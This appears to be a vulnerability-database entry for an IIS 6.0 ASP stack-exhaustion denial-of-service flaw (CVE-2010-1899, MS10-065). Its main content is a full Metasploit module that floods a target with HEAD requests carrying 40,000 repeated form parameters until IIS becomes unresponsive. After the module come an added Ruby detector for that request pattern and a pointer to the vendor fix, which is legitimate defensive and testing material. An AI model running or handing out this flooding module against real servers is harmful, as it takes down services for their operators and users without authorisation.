
Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service

🗓️ 24 Nov 2010 20:10:01
Reported by Heyder Andrade <[email protected]>, Leandro Oliveira <[email protected]>
Type: metasploit
🔗 www.rapid7.com
👁 201 Views

Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service. Remote unauthenticated attackers can force the IIS server to become unresponsive until the IIS service is restarted manually by the administrator. The vulnerability requires that IIS hosts Active Server Pages and that an ASP script reads a POST form value.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service',
      'Description'    => %q{
          The vulnerability allows remote unauthenticated attackers to force the IIS server
        to become unresponsive until the IIS service is restarted manually by the administrator.
        Required is that Active Server Pages are hosted by the IIS and that an ASP script reads
        out a Post Form value.
      },
      'Author'         =>
        [
          'Heyder Andrade <heyder[at]alligatorteam.org>',
          'Leandro Oliveira <leadro[at]alligatorteam.org>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-1899' ],
          [ 'OSVDB', '67978'],
          [ 'MSB', 'MS10-065'],
          [ 'EDB', '15167' ]
        ],
      'DisclosureDate' => '2010-09-14'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('VHOST', [ false, 'The virtual host name to use in requests']),
        OptString.new('URI', [ true, 'URI to request', '/page.asp' ])
      ])
  end


  def run
    uri = datastore['URI']
    print_status("Attacking http://#{datastore['VHOST'] || rhost}:#{rport}#{uri}")

    begin
      while(1)
        begin
          connect
          payload = "C=A&" * 40000
          length = payload.size
          sploit = "HEAD #{uri} HTTP/1.1\r\n"
          sploit << "Host: #{datastore['VHOST'] || rhost}\r\n"
          sploit << "Connection:Close\r\n"
          sploit << "Content-Type: application/x-www-form-urlencoded\r\n"
          sploit << "Content-Length:#{length} \r\n\r\n"
          sploit << payload
          sock.put(sploit)
          #print_status("DoS packet sent.")
          disconnect
        rescue Errno::ECONNRESET
          next
        end
      end
    rescue Errno::EPIPE
      print_good("IIS should now be unavailable")
    end
  end
end
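
A defender-side check for the request shape this module sends: a form-urlencoded body made of one parameter repeated tens of thousands of times, attached to a HEAD request. This is an added example, not part of the Metasploit module or the Rapid7 code base; the function names, the `MAX_FORM_PARAMS` threshold and the host `www.example.test` are assumptions, and the sample requests are constructed.

```ruby
# Added example (not part of the Metasploit module): flag raw HTTP requests
# whose form body matches the pattern the module above generates.
MAX_FORM_PARAMS = 1000 # assumed threshold; set above the largest legitimate form

# Split a raw request into method, lower-cased header map and body.
def parse_request(raw)
  head, body = raw.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  method = lines.shift.to_s.split(' ').first.to_s.upcase
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    headers[name.strip.downcase] = value.to_s.strip unless name.nil?
  end
  [method, headers, body.to_s]
end

# Return the reasons (possibly none) a request looks like parameter flooding.
def suspicious_form_request(raw, max_params = MAX_FORM_PARAMS)
  method, headers, body = parse_request(raw)
  ctype = headers['content-type'].to_s.downcase
  return [] unless ctype.start_with?('application/x-www-form-urlencoded')

  params = body.split('&').reject(&:empty?)
  counts = Hash.new(0) # occurrences of each parameter name
  params.each { |pair| counts[pair.split('=', 2).first] += 1 }
  top = counts.values.max.to_i
  reasons = []
  reasons << "form body has #{params.size} parameters (limit #{max_params})" if params.size > max_params
  reasons << "#{method} request carries a form body" if %w[HEAD GET].include?(method) && !body.empty?
  reasons << "one parameter name repeated #{top} times" if top > max_params
  reasons
end

# Constructed samples: the module's request shape and an ordinary login POST.
def sample_request(method, body)
  "#{method} /page.asp HTTP/1.1\r\nHost: www.example.test\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n" \
    "Content-Length:#{body.size} \r\n\r\n#{body}"
end

FLOOD  = sample_request('HEAD', 'C=A&' * 40000)
BENIGN = sample_request('POST', 'user=alice&pass=secret')
puts suspicious_form_request(FLOOD)
puts suspicious_form_request(BENIGN).empty? ? 'benign: clean' : 'benign: flagged'
```

The same three conditions translate directly into a WAF or reverse-proxy rule placed in front of an unpatched IIS 6.0 host; MS10-065 is the vendor fix referenced by the module.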

02 Oct 2020 20:00 (Current)
0.7 Low risk
Vulners AI Score: 0.7
CVSS2: 4.3
EPSS: 0.57231